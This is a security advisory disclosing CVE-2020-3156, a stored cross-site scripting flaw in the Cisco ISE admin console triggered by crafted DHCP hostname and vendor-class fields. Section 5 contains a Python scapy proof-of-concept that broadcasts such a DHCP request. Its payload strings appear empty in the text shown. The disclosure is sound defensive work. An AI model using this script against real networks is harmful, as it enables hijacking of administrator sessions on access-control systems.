----------------------------------------------------[MZ-19-03]----v1.2--
modzero Security Advisory:
Unauthenticated persistent cross-site scripting injection into the
administrative console of CISCO ISE web application via DHCP request
------------------------------------------------------------------------
------------------------------------------------------------------------
1. Timeline
------------------------------------------------------------------------
* 2019-11-22: Advisory sent to Cisco PSIRT psirt@cisco.com
* 2019-11-22: PSIRT opened case (PSIRT-0535851956)
* 2019-11-22: PSIRT communicated tentative publishing date '2020-02-19'
* 2020-02-12: PSIRT incident manager confirmed reproduceability
* 2020-02-12: Received an unofficial CVE Number CVE-2020-3156
* 2020-02-19: modzero released advisory to the public
In accordance with modzero's disclosure policy, the advisory is
expected to be published not later than February 21st, 2020. Our
disclosure policy is available at:
https://www.modzero.ch/static/modzero_Disclosure_Policy.pdf
------------------------------------------------------------------------
2. About
------------------------------------------------------------------------
Affected vendor: Cisco
Latest known to be vulnerable version products:
* Cisco Identity Services Engine version 2.6.0.156, Patch 2,3
- Product Identifier: SNS-3655-K9
- Version Identifier A0
- ADE-OS Version 3.0.5.144
The Cisco Identity Services Engine is the engine behind Cisco's Network
Access Control solution. It enables the creation and enforcement of
security and access policies for endpoint devices connected to the
company's routers and switches.
------------------------------------------------------------------------
3. Details
------------------------------------------------------------------------
An unauthenticated attacker who is able to inject a specially crafted
DHCP request packet into the network controlled by Cisco Identify
Service Engine (ISE), is able to persistently store code (e. g.
JavaScript), which is executed in the context of the Web-browser
accessing the Web-based management interface.
The vulnerability is due to insufficient validation and encoding of the
attacker-controllable input within the hostname and vendor class
identifier field of processed DHCP request packets.
The attacker-controlled code will be executed in the context of the
user of the Web-based management console. If a legitimate user is
reviewing an Endpoint's attributes within the Identity Services
Engine's Web- based-management-interface.
The attacker-controlled code will be executed in the context of the
user that is currently logged in to the Web-based management console,
when the endpoint attribute details are reviewed by opening the
following
URL:
https://ISESRV/admin/login.jsp#context_dir/context_dir_devices/endpointDetails
------------------------------------------------------------------------
4. Impact
------------------------------------------------------------------------
The code will be executed with the rights of the user accessing the Web-
based management console. If the user has administrative rights, the
attacker might be able to leverage arbitrary functions of the Web-based
management interface.
------------------------------------------------------------------------
5. Proof of Concept exploit
------------------------------------------------------------------------
Using the following python script, two simple JavaScript code fragments
will be sent in the hostname and vendor class identifier fields of the
DHCP request.
#!/usr/bin/env python
from scapy.all import *
import scapy
conf.iface = "eth0"
hostname_payload = ""
vendor_class_id_payload = ""
_, hw = get_if_raw_hwaddr(conf.iface)
ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=hw, type=0x800)
ip = IP(src ='0.0.0.0', dst='255.255.255.255')
udp = UDP (sport=68, dport=67)
bootp = BOOTP(op=1, chaddr=hw)
dhcp = DHCP(options=[("message-type","request"), \
("hostname",hostname_payload),("vendor_class_id", \
vendor_class_id_payload),('end')])
packet = ethernet / ip / udp / bootp / dhcp
sendp(packet, iface=conf.iface)
Once a person reviews the attributes of an endpoint within the ISE web-
based management interface the code will be executed.
------------------------------------------------------------------------
6. Workaround
------------------------------------------------------------------------
-
------------------------------------------------------------------------
7. Fix
------------------------------------------------------------------------
No software updates are available yet.
------------------------------------------------------------------------
8. Credits
------------------------------------------------------------------------
* Max Moser
* Katharina Maennle
------------------------------------------------------------------------
9. About modzero
------------------------------------------------------------------------
The independent company modzero assists clients with security analysis
in the complex areas of computer technology. The focus lies on
highly detailed technical analysis of concepts, software and
hardware components as well as the development of individual
solutions. Colleagues at modzero work exclusively in practical,
highly technical computer-security areas and can draw on decades of
experience in various platforms, system concepts, and designs.
Website: https://www.modzero.ch
E-Mail: contact@modzero.ch
------------------------------------------------------------------------
10. Disclaimer
------------------------------------------------------------------------
The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.